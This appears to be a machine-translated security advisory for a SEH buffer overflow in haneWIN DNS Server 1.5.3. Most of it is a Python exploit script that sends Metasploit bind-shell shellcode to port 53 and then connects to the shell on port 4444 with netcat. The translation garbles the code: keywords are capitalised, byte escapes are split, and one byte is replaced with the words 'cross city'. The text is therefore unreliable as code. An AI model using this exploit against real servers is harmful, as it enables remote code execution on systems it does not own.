HaneWIN DNS Server Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Hanewin haneWIN DNS Server 1.5.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65287

HaneWIN DNS Server is a DNS Server on Windows.

HaneWIN DNS Server 1.5.3 and other versions have SEH overflow when processing a large amount of data. Attackers can exploit this vulnerability to execute arbitrary code in the application context.

<* Source: Dario Estrada
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python

# Exploit Title: haneWIN DNS Server (SEH)
# Author: Dario Estrada (dash) https://intrusionlabs.org
# Date: 2014-01-29
# Version: haneWIN DNS Server 1.5.3
# Vendor Homepage: http://www.hanewin.net/
# Vulnerable app link: http://www.hanewin.net/dns-e.htm
# Tested on: Windows XP SP3
# Thanks to God, to my family and all my friends for always being there
#
# Description:
# A seh overflow occurs when large amount of data is sent to the server
#
Import socket, sys, OS, time

Usage = "\ n Usage:" + sys. argv [0] + "
If len (sys. argv) <2:
Print usage
Sys. exit (0)

Host = sys. argv [1]

Shellcode = (
# Msfpayload windows/shell_bind_tcp R | msfencode-t c-B '\ x00 \ xff \ x0a \ x0d'
"\ Xb8 \ xdf \ x64 \ x04 \ x29 \ xd9 \ xc7 \ xd9 \ x74 \ x24 \ xf4 \ x5d \ x29 \ xc9 \ xb1"
"\ X56 \ x31 \ x45 \ x13 \ x83 \ xed \ xfc \ x03 \ x45 \ xd0 \ x86 \ xf1 \ xd5 \ x06 \ xcf"
"\ Xfa \ x25 \ xd6 \ xb0 \ x73 \ xc0 \ xe7 \ xe2 \ xe0 \ x80 \ x55 \ x33 \ x62 \ xc4 \ x55"
"\ Xb8 \ x26 \ xfd \ xee \ xcc \ xee \ xf2 \ x47 \ x7a \ xc9 \ x3d \ x58 \ x4a \ xd5 \ x92"
"\ X9a \ xcc \ xa9 \ xe8 \ xce \ x2e \ x93 \ x22 \ x03 \ x2e \ xd4 \ x5f \ xeb \ x62 \ x8d"
"\ X14 \ x59 \ x93 \ xba \ x69 \ x61 \ x92 \ x6c \ xe6 \ xd9 \ xec \ x09 \ x39 \ xad \ x46"
"\ X13 \ x6a \ x1d \ xdc \ x5b \ x92 \ x16 \ xba \ x7b \ xa3 \ xfb \ xd8 \ x40 \ xea \ cross city"
"\ X2a \ x32 \ xed \ x50 \ x62 \ xbb \ xdf \ x9c \ x29 \ x82 \ xef \ x11 \ x33 \ xc2 \ xc8"
"\ Xc9 \ x46 \ x38 \ x2b \ x74 \ x51 \ xfb \ x51 \ xa2 \ xd4 \ x1e \ xf1 \ x21 \ x4e \ xfb"
"\ X03 \ xe6 \ x09 \ x88 \ x08 \ x43 \ x5d \ xd6 \ x0c \ x52 \ xb2 \ x6c \ x28 \ xdf \ x35"
"\ Xa3 \ xb8 \ x9b \ x11 \ x67 \ xe0 \ x78 \ x3b \ x3e \ x4c \ x2f \ x44 \ x20 \ x28 \ x90"
"\ Xe0 \ x2a \ xdb \ xc5 \ x93 \ xb4 \ xb4 \ x2a \ xae \ x8a \ x44 \ x24 \ xb9 \ xf9 \ x76"
"\ Xeb \ x11 \ x96 \ x3a \ x64 \ xbc \ x61 \ x3c \ x5f \ x78 \ xfd \ xc3 \ x5f \ x79 \ xd7"
"\ X07 \ x0b \ x29 \ x4f \ xa1 \ x33 \ xa2 \ x8f \ x4e \ xe6 \ x65 \ xc0 \ xe0 \ x58 \ xc6"
"\ Xb0 \ x40 \ x08 \ xae \ xda \ x4e \ x77 \ xce \ xe4 \ x84 \ x0e \ xc8 \ x2a \ xfc \ x43"
"\ Xbf \ x4e \ x02 \ x72 \ x63 \ xc6 \ xe4 \ x1e \ x8b \ x8e \ xbf \ xb6 \ x69 \ xf5 \ x77"
"\ X21 \ x91 \ xdf \ x2b \ xfa \ x05 \ x57 \ x22 \ x3c \ x29 \ x68 \ x60 \ x6f \ x86 \ xc0"
"\ Xe3 \ xfb \ xc4 \ xd4 \ x12 \ xfc \ xc0 \ x7c \ x5c \ xc5 \ x83 \ xf7 \ x30 \ x84 \ x32"
"\ X07 \ x19 \ x7e \ xd6 \ x9a \ xc6 \ x7e \ x91 \ x86 \ x50 \ x29 \ xf6 \ x79 \ xa9 \ xbf"
"\ Xea \ x20 \ x03 \ xdd \ xf6 \ xb5 \ x6c \ x65 \ x2d \ x06 \ x72 \ x64 \ xa0 \ x32 \ x50"
"\ X76 \ x7c \ xba \ xdc \ x22 \ xd0 \ xed \ x8a \ x9c \ x96 \ x47 \ x7d \ x76 \ x41 \ x3b"
"\ Xd7 \ x1e \ x14 \ x77 \ xe8 \ x58 \ x19 \ x52 \ x9e \ x84 \ xa8 \ x0b \ xe7 \ xbb \ x05"
"\ Xdc \ xef \ xc4 \ x7b \ x7c \ x0f \ x1f \ x38 \ x8c \ x5a \ x3d \ x69 \ x05 \ x03 \ xd4"
"\ X2b \ x48 \ xb4 \ x03 \ x6f \ x75 \ x37 \ xa1 \ x10 \ x82 \ x27 \ xc0 \ x15 \ xce \ xef"
"\ X39 \ x64 \ x5f \ x9a \ x3d \ xdb \ x60 \ x8f"
)

NSEH = '\ xeb \ x06 \ x90 \ x90'
SEH = '\ xd1 \ x07 \ xfc \ x7f'
Opcode = "\ xe9 \ xdf \ xf6 \ xff"
Junk = 'A' * (2324-len (shellcode ))
Padding = 'A '* 600

Buff = shellcode + junk + nSEH + SEH + opcode + padding

Print "[+] Connecting to % s: 53" % (host)
Try:
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect (host, 53 ))
Aix = shellcode + 'A' * (2324-len (shellcode ))
Print "[*] Sending payload .." + "shellcode:" + str (len (shellcode ))
S. send (buff)
Print "[*] Exploit Sent Successfully! "
S. close ()
Print "[+] Waiting for 5 sec before spawning shell to" + host + ": 4444 \ r"
Time. sleep (5)
OS. system ("nc-n" + host + "4444 ")
Except t:
Print "[!] Cocould not connect to "+ host +": 53 \ r"
Sys. exit (0)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Hanewin
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.hanewin.net/dns-e.htm